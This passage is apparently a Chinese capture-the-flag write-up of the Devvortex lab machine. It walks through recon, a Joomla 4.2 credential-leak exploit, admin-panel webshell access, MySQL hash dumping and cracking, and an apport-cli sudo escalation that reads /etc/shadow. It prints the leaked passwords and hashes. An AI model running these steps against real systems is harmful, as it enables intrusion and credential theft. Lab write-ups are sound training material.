基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV 10.10.11.242
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 13:42 CST
Nmap scan report for 10.10.11.242
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.99 seconds

80

需要加hosts:

1
10.10.11.242 devvortex.htb

一个公司官网

子域名扫描

子域名可以发现dev:

1
2
3
4
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://devvortex.htb/" -H 'Host: FUZZ.devvortex.htb' -fs 154

[Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 518ms]
    * FUZZ: dev

dev

添加hosts后访问,看起来是另一个版本的官网:

目录扫描

目录扫描可以在dev下发现administrator和README.txt ,administrator访问是joomla,readme中给出版本号4.2

1
2
3
4
5
6
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://dev.devvortex.htb/ -x txt,php,html

/LICENSE.txt          (Status: 200) [Size: 18092]
/README.txt           (Status: 200) [Size: 4942]
/administrator        (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/administrator/]
/api                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/api/]

administrator

readme

joomla

根据joomla版本信息可以搜到相关漏洞:

(小坑,下载下来文件扩展名是py,但实际上是ruby代码)

得到一组账号密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ruby 51334.rb http://dev.devvortex.htb

Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

administrator

得到的账号密码可以登录administrator:

shell

后面就是常规的joomla后台getshell,修改php文件,访问,得到www-data:

mysql

另外得到的这组账号密码也是数据库账号,数据库中可以获取到另一个用户logan的hash:

1
2
3
4
5
6
7
8
9
10
mysql -u lewis -pP4ntherg0t1n5r3c0n##

mysql> show databases;
mysql> use joomla;
mysql> show tables;
mysql> desc sd4fg_users;
mysql> select username,password from sd4fg_users;

lewis : $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan : $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

可以破解出logan用户密码,logan用户也是Linux系统用户:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

tequieromucho

user flag

得到的账号密码登录:

提权信息

可以sudo运行apport-cli,搜到apport-cli相关提权漏洞:

利用需要一个crash文件,简单的自己生成一个即可:

提权 & root flag

根据参考资料,生成crach,运行apport-cli:

1
2
3
4
5
6
7
8
9
10
sleep 10 &
killall -SIGSEGV sleep
sudo /usr/bin/apport-cli -c ./_usr_bin_sleep.1000.crash

Please choose (S/V/K/I/C): V

!id
!ls /root
!cat /root/root.txt
!cat /etc/shadow

shadow

1
2
root:$6$kdYdkbdlt4MMS7Qx$/lIiEByq.cgsQPyd82QDfhA/Qb5IgaukiUN0OOKewugqr1qeFFiQ4t2sAdiyAmUssoeg3.h1k/2BpdTRthmum.:19654:0:99999:7:::
logan:$6$pkg18zw/pi3z1r.f$g.zN3Yi1iLQmEcsi5S57UMl7qWgUNoo8xA3Z4TczzM1nMK5NhXgW0J.DPvS4lG9UISgGk5zsYDOpk7uPBY2Ya1:19626:0:99999:7:::

参考资料